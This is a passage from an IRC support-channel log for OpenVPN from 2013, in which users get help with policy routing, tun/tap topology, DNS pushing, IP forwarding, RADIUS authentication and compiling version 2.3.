which is the client 02:04 < jzaw> its this laptop 02:04 < jzaw> the net connection here is nat via that same router 02:04 < pekster> So, it looks like this: [some Internet host] -> (Internet) -> (router VPN client) -> [router's LAN] -> [laptop on LAN] ? 02:05 < pekster> Well, plus your VPN server and link between the web and router VPN client, yes? 02:05 < jzaw> if i understand that topo yes 02:06 < pekster> In order to keep arbitrary reply traffic arriving over the tap device going back out that way when you don't know the source in advance (like my public IP pinging you) you need to mark the connection and route based on that 02:06 < pekster> The VPN client is a linux box, yes? 02:07 < jzaw> yes openwrt on a tp-link wr740n 02:07 < jzaw> so iptables marking ? 02:07 < pekster> Okay, so you need to do a few things. 1) create a secondary routing table (table 10 or w/e is fine.) Add the tap network route like you had before, *plus* a default route going to the VPN server 02:08 < pekster> Then you need to use the connmark module (see the iptables-extensions(8) manpage for details) and mark the connection of anything arriving via the tap device 02:09 < pekster> Finally, you need to copy the connmark to the per-packet mark in the mangle table on mangle/PREROUTING so you can use the fwmark as your routing decision in the 'ip' command 02:09 * jzaw nods 02:09 < jzaw> just one q though 02:09 < jzaw> you say default route to vpn server 02:09 < pekster> Add an 'ip rule' to filter on the fwmark, and send it to table 10 02:09 < jzaw> but i only want lan traffic to go down the vpn not all 02:10 < pekster> Are you trying to put all the LAN's traffic going anyway down the VPN, or just reply traffic to what's sent to a LAN client over the VPN? 02:10 < pekster> Do you want a LAN PC's request for, say, youtube to go across the VPN? 02:11 < jzaw> nope ... 
but if a request for say something from xyz.dzki.co.uk that should go down the vpn 02:11 < pekster> routing doesn't deal with domain names, only IPs 02:11 < jzaw> if its come up the vpn i also want it to go back down 02:11 < pekster> Right 02:11 < jzaw> sure i was just using dzk.co.uk to define that group of ips 02:12 < pekster> The return routing needs the connmark, connmark -> fwmark, plus policy routing to do 02:12 < jzaw> its a pub subnet (different to the nat lan here) 02:12 < pekster> As for the routing of that subnet, just put it on the default table and you might as well let openvpn manage that addition when it comes up 02:13 * jzaw nods 02:13 < pekster> It's really just the reply to connections sent to your clients that's the tricky part 02:13 < jzaw> yes ... as they are pub ips ... they will be coming up the vpn from the server end 02:13 < jzaw> they need to go back there 02:13 < pekster> I'm not sure why you're using tap for your VPN though. routing should be plenty sufficient since you're routing anyway 02:14 < pekster> tun is for routing, tap is for bridging 02:14 * jzaw nods ... simple change 02:14 < pekster> As long as you don't intend to be bridging, yes 02:14 < jzaw> ah it was cos i only had the /29 and tap seemed to use fewer ips for the vpn 02:14 < pekster> !/30 02:14 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 02:15 < jzaw> tun seems to use 4 02:15 < pekster> That explains why. 
Use topology subnet 02:15 < jzaw> k cool 02:16 -!- ade_b [~Ade@koln-5d815ef7.pool.mediaWays.net] has joined #openvpn 02:16 -!- ade_b [~Ade@koln-5d815ef7.pool.mediaWays.net] has quit [Changing host] 02:16 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:16 < jzaw> but im now just using 10.x.x.x for the vpn so no limit 02:17 < pekster> It's generally pointless to assign more than a /24 to openvpn since you end up being limited in terms of the CPU/single-threaded model long before you can use ~253 clients 02:18 < jzaw> aye 02:19 < jzaw> btw i mean i use 10.x.x.x for the tap ..which will be tun soon 02:19 < jzaw> server end has pub ips ... and so does the client end 02:20 < jzaw> but client end ips are routed to my gw ip at the server end thus need to go down the vpn to reach them 02:21 < pekster> Yup, I've set up VPNs like that before 02:23 < pekster> In my case the policy routing was easier, since the client end had 2 VLANs, and one was sent strictly out the local ISP, and the other only had internal corp LANs routed across the VPN, with the default gateway set to the local ISP as well 02:23 < pekster> But, the only real complication for your setup is that packet/connection marking business 02:24 < jzaw> i see 02:25 < pekster> That did mean external (non-corp) things couldn't ever reach the LAN clients by external IP, but that was firewalled anyway, so it didn't matter 02:25 < pekster> You want that to work :) 02:27 < jzaw> aye :) 02:27 -!- corretico [~luis@190.211.93.38] has quit [Read error: Connection reset by peer] 02:30 -!- corretico [~luis@190.211.93.38] has joined #openvpn 02:39 -!- corretico [~luis@190.211.93.38] has quit [Remote host closed the connection] 02:42 -!- corretico [~luis@190.211.93.38] has joined #openvpn 04:03 -!- Morg0th [~Morg0th@82-212-146-28.teledisnet.be] has joined #openvpn 04:13 -!- zz_AsadH is now known as AsadH 04:15 -!- brute11k [~brute@89.249.230.137] has joined #openvpn 04:21 -!- iliketrains [~TF7@p578b0d2b.dip0.t-ipconnect.de] 
has joined #openvpn 04:25 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 252 seconds] 04:30 < Morg0th> hello, i'm trying to connect to a VPN on Linux, in the output of "openvpn /etc/openvpn/openvpn.conf" it looks like it's working but i still can't access the VPN network. i see the ppp0 interface, is there anything else i should do after running openvpn? 04:31 -!- iliketrains [~TF7@p578b0d2b.dip0.t-ipconnect.de] has quit [Ping timeout: 264 seconds] 04:37 < Morg0th> i put my openvpn.conf here: http://codepad.org/JcQS78lQ 04:37 <@vpnHelper> Title: Plain Text code - 16 lines - codepad (at codepad.org) 04:43 -!- iliketrains [~TF7@pd95b7877.dip0.t-ipconnect.de] has joined #openvpn 04:45 < iliketrains> good morning! could someone help me with a little problem? (openvpn srv won't start) 04:54 -!- iliketrains [~TF7@pd95b7877.dip0.t-ipconnect.de] has quit [] 04:55 < jzaw> does openvpn run on obsd 04:55 < jzaw> ooh seems like it might :) 05:12 < kisom> What MIME-type should be used on iOS/Android to have a configuration file open in the app? 
05:14 < kisom> application/x-openvpn-profile did the trick
07:02 < Wulf> Morg0th: ppp0?
09:16 < Morg0th> Wulf: sorry i meant the tap0 interface. ppp0 was from when i tried with pptp which didn't work either
09:25 < bkrieg1337> hello
09:25 <@ecrist> hello
09:25 < bkrieg1337> i need help setting up openvpn
09:25 < bkrieg1337> im stuck at client setup
09:26 < bkrieg1337> help please
09:26 < bkrieg1337> this is the guide i followed https://help.ubuntu.com/12.04/serverguide/openvpn.html
09:26 <@vpnHelper> Title: OpenVPN (at help.ubuntu.com)
09:28 <@ecrist> !howto
09:28 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
09:29 < bkrieg1337> reading. thank for resource
09:30 < bkrieg1337> thank you*
10:13 < dekroning> hi
10:13 < dekroning> i'm using openvpnas and i'm having troubles with 2 linux boxes that are connected
10:13 < rob0> !as
10:13 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
10:13 < dekroning> thanks
10:13 < rob0> yw
11:50 < hrenovo> !dns
11:50 <@vpnHelper> "dns" is (#1) Level3 open recursive DNS server at 4.2.2.[1-6] or (#2) Google open recursive DNS server at 8.8.8.8 / 8.8.4.4 or (#3) you might be looking for !pushdns
11:50 < hrenovo> !pushdns
11:50 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also
11:50 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7
11:57 < hrenovo> hi guys
11:57 < hrenovo> so trying to push all traffic to the client vpn tunnel
11:57 < hrenovo> I am following the redirect_diagram.png
11:58 < hrenovo> I am at a point where I can ping 8.8.8.8
11:58 < hrenovo> but not google.com
11:58 < hrenovo> I just added push "dhcp-option DNS 10.8.0.1" in server.conf
11:58 < hrenovo> but no luck so far
12:00 < hrenovo> any services besides openvpn server that I forgot to restart ?
12:12 < hrenovo> nvm got it
12:12 < hrenovo> its all working fine now
12:13 < bkrieg1337> hello
12:13 < bkrieg1337> :)
12:13 < hrenovo> )
12:13 < hrenovo> http://www.speedtest.net/result/2576159745.png
12:13 < hrenovo> with openvpn
12:14 < bkrieg1337> nice
12:30 < hrenovo> !def1
12:30 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1"
12:32 < hrenovo> !redirect
12:32 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
12:32 <@vpnHelper> http://ircpimps.org/redirect.png
12:32 < hrenovo> !linforward
12:32 < hrenovo> !linforward
12:32 < hrenovo> !ipforward
12:32 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall
12:33 < hrenovo> !linipforward
12:33 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
15:12 < jzaw> at the mo i'm having to manually add a route for the client network
15:13 < jzaw> can i get that to automate at the server using the ccd files?
15:13 < kisom> jzaw: No. Use a client connect script.
15:14 < jzaw> does the file in the ccd dir take the same name as the cn on the cert/key of the client
15:14 < kisom> Also:
15:14 < kisom> !goal
15:14 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
15:15 < jzaw> kisom ... ive a routed home lan ..... the client end is nat ... but the lan ips are pub ips
15:15 < jzaw> they are routed to the homelan gw and must go down the vpn to reach the actual hosts
15:15 < jzaw> im using 10.x.x.x as the tun ips
15:15 < jzaw> ive routes set up but every time the server is restarted
15:16 < jzaw> i have to manually add the route to the client ips
15:16 <@ecrist> are you dropping privs? or are you not running as admin?
15:16 < jzaw> not dropping privs at this time
15:16 <@ecrist> !logs
15:16 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
15:17 < jzaw> pasting
15:56 < Visitorerer> My friend and I are connected through Tunnelblick, but we can't ping each other. Config/logs here : http://pastebin.com/7rvRbivz
15:57 < Visitorerer> We can see each other's iTune library though
15:57 < Visitorerer> iTunes*
16:44 < Nemus> !config
16:44 <@vpnHelper> (config []) -- If is given, sets the value of to . Otherwise, returns the current value of . You may omit the leading "supybot." in the name if you so choose.
17:17 < hrenovo> greetings. how can i configure openvpn to auto start with windows
17:18 < hrenovo> openvpn gui
17:19 < Valcorb> hrenovo: put a shortcut of openvpn-gui.exe (located in C:/Program Files/OpenVPN/bin) in %Appdata%/Roaming/Microsoft/Windows/Start Menu/Startup
17:24 < hrenovo> Valcorb: thanks
17:24 < Valcorb> np
17:30 < rob0> !pki
17:30 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Heres a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that each other were signed by the right ca.key. Optionally, the client also checks that the server cert was
17:30 <@vpnHelper> signed specially as a server (see !servercert)
18:01 < _pll> Hello, I'm having a routing issue, I would like to specify the device that's used when pushing a route to the client.
18:02 < _pll> I would like for the client to have "192.168.1.3 via 192.168.1.2 dev tap0"
18:03 < _pll> but when I use the push "route 192.168.1.3 255.255.255.255" the result is 192.168.1.3 via 192.168.1.2 dev eth0
18:03 < _pll> Is there a way to do that or do I have to give each client a .bat file?
18:04 < _pll> I'm using bridged tap.
19:28 < dkorzhevin> Guys, can you please advise what i can use to connect OpenVPN to FreeRADIUS?
19:28 < dkorzhevin> Should i use openvpn-auth-pam or radiusplugin?
19:29 < dkorzhevin> I have a remote freeradius server, which is already used as auth server for ipsec, l2tp, pptp... and now i want to use it with openvpn
19:30 < dkorzhevin> I tried to use the howto on this page: http://www.vpsdash.com/?p=163 but something doesn't work
19:30 <@vpnHelper> Title: Easy Setup of Openvpn on Debian to use Radius authentication. « vpsdash (at www.vpsdash.com)
19:30 < dkorzhevin> I wrote a forum post with full logs at the official forum https://forums.openvpn.net/post28526.html#p28526
19:30 <@vpnHelper> Title: OpenVPN Support Forum OpenVPN with freeradius authentication : Configuration (at forums.openvpn.net)
19:31 < dkorzhevin> Maybe openvpn-auth-pam is a better solution?
19:31 < dkorzhevin> Please advise
23:16 < cap_sensitive> Hi. Can I redirect all openvpn data to an external proxy?
23:17 < cap_sensitive> on the server side
23:41 <@ecrist> what do you mean
23:44 < cap_sensitive> ecrist: So once I connect to the VPN, I can access the Internet via the proxy (indirectly)
23:49 < rob0> A VPN, when connected, gives you an IP address (and a route across the VPN using that address.) What you do with it, or don't do with it, is up to you.
23:50 <@ecrist> cap_sensitive: if you control the server, you can do whatever you want with the VPN
23:50 <@ecrist> !goal
23:50 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
23:58 < cap_sensitive> ecrist: Can you give me a direction (such as reading a certain manual?), Can I achieve it via iptables purely (forward all packets to a certain external proxy)?
--- Day changed Sat Mar 16 2013
00:00 <@ecrist> you can do that.
00:00 <@ecrist> you can do a redirect, forcing ALL VPN traffic over the VPN
00:00 <@ecrist> that's what I usually do
00:04 < cap_sensitive> ecrist: I have done that. The problem is that the VPN server has its own 'public' IP addr, and I want to forward all packets to another server that also has a 'public' domain.
00:04 < cap_sensitive> Currently all traffic goes through the VPN directly,
00:05 < cap_sensitive> but now I want all the traffic that goes through the VPN to then go through the external proxy.
00:12 < cap_sensitive> Maybe I can forward all packets to that proxy, but that proxy requires auth.
00:13 < cap_sensitive> though I should be able to run a local python http proxy to handle the auth at the server side, but I'd like to avoid that, if possible.
00:14 < cap_sensitive> !goal I would like to make all traffic that goes through the VPN then go through another external proxy which requires authentication
00:17 <@ecrist> !notovpn
00:17 <@vpnHelper> "notovpn" is "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem
00:45 <@plaisthos> kisom: application/x-openvpn-profile
00:54 < soapee01> Frack krzee. I love that crazy bastard. Where in this moment in time is he in this moment in the world?
03:27 < jzaw> whats the best / easiest way to get 2.3.x on debian wheezy
03:27 < jzaw> compile from git?
03:27 < jzaw> or use the tarball gz
03:27 < jzaw> is it recommended?
03:28 < ngharo> my buddy made a package
03:28 < ngharo> http://dc414.org/~uberushaximus/openvpn_2.3.0_i386.deb
03:29 < ngharo> compiling from sauce is just fine too
03:29 < jzaw> my reason for wanting 2.3.x is for its (maybe) superior ipv6 support ?
03:30 < jzaw> will dpkg -i that deb also pull any deps from the wheezy repo?
03:30 < ngharo> i've been seeing new ipv6 patches land in git
03:30 < ngharo> i'd pull from git if you want at the latest stuff
03:30 < jzaw> which branch ?
03:31 < jzaw> i think id like to do that
03:32 < ngharo> !git
03:32 <@vpnHelper> "git" is (#1) For the stable git tree: git clone git://openvpn.git.sourceforge.net/gitroot/openvpn/openvpn.git or (#2) For the development git tree: git clone git://openvpn.git.sourceforge.net/gitroot/openvpn/openvpn-testing.git or (#3) Browse the git repositories here: http://openvpn.git.sourceforge.net/git/gitweb-index.cgi or (#4) See !git-doc how to use git
03:32 < ngharo> ok by "some" i meant "one" :)
03:34 < jzaw> hehe
03:34 < ngharo> ipv6 works fine though, go for it
03:34 < jzaw> ok so the whole reconf command as per INSTALL for repo compile?
03:35 < jzaw> when i look at the --version on wheezy it shows me the ./configure options used to compile that one
03:35 < jzaw> should i use the same?
03:35 < jzaw> or just bare ./configure?
03:36 < ngharo> i use the iproute2 enable flag per pekster's recommendation
03:36 < ngharo> thats all i set when compiling personally
03:40 < jzaw> http://sprunge.us/AjjT
03:40 < jzaw> thats what is set in the wheezy deb
03:41 < jzaw> ./configure --enable-iproute2
03:41 < jzaw> ngharo, ^^ ?
03:41 < jzaw> nowt else?
03:41 < jzaw> k trying now
03:42 < ngharo> ya debian packaging tools does some crazy business
03:42 < ngharo> hence that configure string
04:03 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
04:13 < jzaw> ngharo, heres a question re ipv6
04:13 < jzaw> non tunneled i can reach my home lan via ipv4 or ipv6
04:13 < jzaw> i can ssh in via either / both
04:14 < jzaw> and when i admin the network it has been known for me to kill my ipv4 cos of some silly typo in network/interfaces
04:14 < jzaw> but since i can get in via ipv6 ... just fix ipv4 and its up and running again
04:15 < jzaw> can one have two ovpn tunnels, one on ipv4 and one on ipv6 ?
04:15 < jzaw> so ill always have a secure tun if i break one
04:22 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has joined #openvpn
04:25 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has left #openvpn []
04:35 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection]
04:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
04:42 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
04:44 -!- newbie|4 [~tjz@bb219-74-189-54.singnet.com.sg] has joined #openvpn
04:46 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 252 seconds]
04:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
05:07 -!- erry_ is now known as erry
05:51 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
06:12 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 256 seconds]
06:20 -!- JSharpe [~JSharpe@web.sinexdigitalrecovery.com] has joined #openvpn
06:20 -!- master_o1_master [~master_of@p4FF24889.dip.t-dialin.net] has joined #openvpn
06:24 -!- master_of_master [~master_of@p4FF24CC9.dip.t-dialin.net] has quit [Ping timeout: 252 seconds]
06:25 -!- catsup [~d@64.111.123.163] has joined #openvpn
06:31 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer]
06:31 -!- catsup [~d@64.111.123.163] has joined #openvpn
06:42 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
06:50 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Read error: Connection reset by peer]
06:53 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
06:56 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds]
06:56 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has joined #openvpn
07:10 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 246 seconds]
07:18 < Dennis84> hi
07:20 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds]
07:23 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
07:31 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection]
07:34 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
07:54 -!- dekroning [~dekroning@vps3.cttinnovations.net] has quit [Ping timeout: 276 seconds]
07:59 -!- mcp [~mcp@wolk-project.de] has quit [Excess Flood]
08:00 -!- mcp [~mcp@wolk-project.de] has joined #openvpn
08:06 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
08:09 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds]
08:11 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
08:22 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
08:51 -!- meskarune [~meskarune@maharani.meskarune.com] has joined #openvpn
08:52 < meskarune> Hey, I have a question about installing OpenVPN access server on a Linode. Getting this error: Error: iptables service not started because of error (SVC_RUN_EXCEPT)
08:52 < meskarune> Linode is a XEN VPS host
08:52 < meskarune> I've been web searching and can't find much on that error message. how could I go about diagnosing this further?
09:03 <@EugeneKay> !notopenvpn
09:03 <@vpnHelper> "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem
09:04 <@EugeneKay> Also, what weird init script/distro are you using for iptables that gives that?
09:05 <@EugeneKay> Ah I see; it's an AS error
09:05 <@EugeneKay> !as
09:05 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
09:06 <@EugeneKay> I can tell you that vanilla openvpn works just fine on Linodes
09:10 < Martin`> What is the difference between openvpn and as?
09:11 < Martin`> just an ui for openvpn or more?
09:11 <@EugeneKay> AS is a commercial product by OpenVPN Technologies
09:11 < Martin`> ok
09:11 * Martin` likes the vanilla one :P
09:11 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has quit [Ping timeout: 248 seconds]
09:11 < Martin`> I only have a strange problem, when I start a youtube movie on my laptop (or other movie in browser) openvpn reconnects :/
09:12 < Martin`> using tunnelblick on mac osx
09:12 <@EugeneKay> That's an interesting one.
09:13 < Martin`> I know, not sure what can be the problem
09:13 <@EugeneKay> Me neither.
09:21 -!- xbanux [~xbanux@triband-mum-59.182.171.64.mtnl.net.in] has quit [Read error: Connection reset by peer]
09:21 -!- xbanux [~xbanux@triband-mum-59.182.152.115.mtnl.net.in] has joined #openvpn
09:23 < meskarune> thanks EugeneKay :)
09:25 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds]
09:27 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
09:33 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
09:37 -!- HyperGlide [~HyperGlid@125.69.7.147] has joined #openvpn
09:47 -!- master_of_master [~master_of@p4FF249F3.dip.t-dialin.net] has joined #openvpn
09:49 -!- master_o1_master [~master_of@p4FF24889.dip.t-dialin.net] has quit [Ping timeout: 248 seconds]
10:15 -!- diffen3 [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Ping timeout: 245 seconds]
10:32 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
10:41 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
10:48 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds]
10:54 -!- brute11k [~brute@89.249.235.53] has quit [Ping timeout: 264 seconds]
10:57 -!- brute11k [~brute@89.249.235.53] has joined #openvpn
10:57 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
10:57 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 272 seconds]
11:05 -!- novaflash is now known as novaflash_away
11:10 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
11:11 -!- novaflash_away is now known as novaflash
11:23 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
11:26 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
11:26 -!- mode/#openvpn [+v s7r] by ChanServ
11:32 -!- riot [~riot@eris.hackerfleet.org] has quit [Ping timeout: 260 seconds]
11:38 -!- riot [~riot@eris.hackerfleet.org] has joined #openvpn
11:56 -!- hatschi [~marvin@dslb-188-098-223-091.pools.arcor-ip.net] has joined #openvpn
12:35 -!- brute11k [~brute@89.249.235.53] has quit [Ping timeout: 255 seconds]
12:35 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
12:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
12:37 -!- brute11k [~brute@89.249.235.53] has joined #openvpn
12:51 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 245 seconds]
13:00 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 260 seconds]
13:01 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn
13:09 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn
13:10 -!- master_o1_master [~master_of@p4FF24414.dip.t-dialin.net] has joined #openvpn
13:12 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
13:13 -!- master_of_master [~master_of@p4FF249F3.dip.t-dialin.net] has quit [Ping timeout: 260 seconds]
13:17 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
13:18 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
13:22 -!- hatschi [~marvin@dslb-188-098-223-091.pools.arcor-ip.net] has quit [Quit: hatschi]
13:23 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 245 seconds]
13:30 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn
13:31 -!- raidz_away [~raidz@46.28.203.186] has joined #openvpn
13:31 -!- kubbing [~kubbing@89.177.146.18] has quit [Read error: Connection reset by peer]
13:32 -!- raidz_away is now known as raidz
13:32 -!- raidz [~raidz@46.28.203.186] has quit [Changing host]
13:32 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn
13:32 -!- mode/#openvpn [+o raidz] by ChanServ
13:32 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
13:33 -!- master_of_master [~master_of@p4FF24E5B.dip.t-dialin.net] has joined #openvpn
13:36 -!- master_o1_master [~master_of@p4FF24414.dip.t-dialin.net] has quit [Ping timeout: 256 seconds]
13:43 -!- Sidze- [~Sid@ppp-seco11pa2-46-193-129.71.wb.wifirst.net] has joined #openvpn
13:46 < Sidze-> hi all, I have an issue with openvpn with Xubuntu 12.10 as client and Proxmox VE 2.3 as server. My server configuration seems to work and my client configuration too. I can connect to the server but I can't get outside. I think I have a routing issue, can anyone tell me if there is an issue with the routes: http://paste.debian.net/242150/
13:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds]
13:56 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
13:58 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
14:01 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Read error: Operation timed out]
14:06 -!- meskarune [~meskarune@maharani.meskarune.com] has left #openvpn ["WeeChat 0.4.0"]
14:08 -!- xbanux [~xbanux@triband-mum-59.182.152.115.mtnl.net.in] has quit [Ping timeout: 260 seconds]
14:12 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has joined #openvpn
14:28 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat]
14:37 -!- nonotza_ [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn
14:37 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Ping timeout: 245 seconds]
14:37 -!- nonotza_ is now known as nonotza
14:39 -!- Sidze- [~Sid@ppp-seco11pa2-46-193-129.71.wb.wifirst.net] has quit [Read error: Operation timed out]
14:42 -!- Sidze- [~Sid@ppp-seco11pa2-46-193-129.71.wb.wifirst.net] has joined #openvpn
14:51 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds]
14:57 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
15:11 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 264 seconds]
15:11 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
15:14 -!- Sidze- [~Sid@ppp-seco11pa2-46-193-129.71.wb.wifirst.net] has quit [Read error: Connection reset by peer]
15:28 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Quit: nonotza]
15:28 -!- master_of_master [~master_of@p4FF24E5B.dip.t-dialin.net] has quit [Read error: Operation timed out]
15:32 -!- master_of_master [~master_of@p4FF2495D.dip.t-dialin.net] has joined #openvpn
15:47 -!- brute11k [~brute@89.249.235.53] has quit [Quit: Leaving.]
15:57 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 276 seconds]
15:58 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
16:14 -!- m0r0n|3 [~kvirc@dsl-67-55-0-106.acanac.net] has joined #openvpn
16:14 < m0r0n|3> Hello
16:15 < m0r0n|3> My isp is hosting a vpn for me and when I connect to it using the same login info one of my computers gets disconnected. How do I connect two computers to the VPN?
16:40 < pekster> This is an OpenVPN connection? And do you control the server?
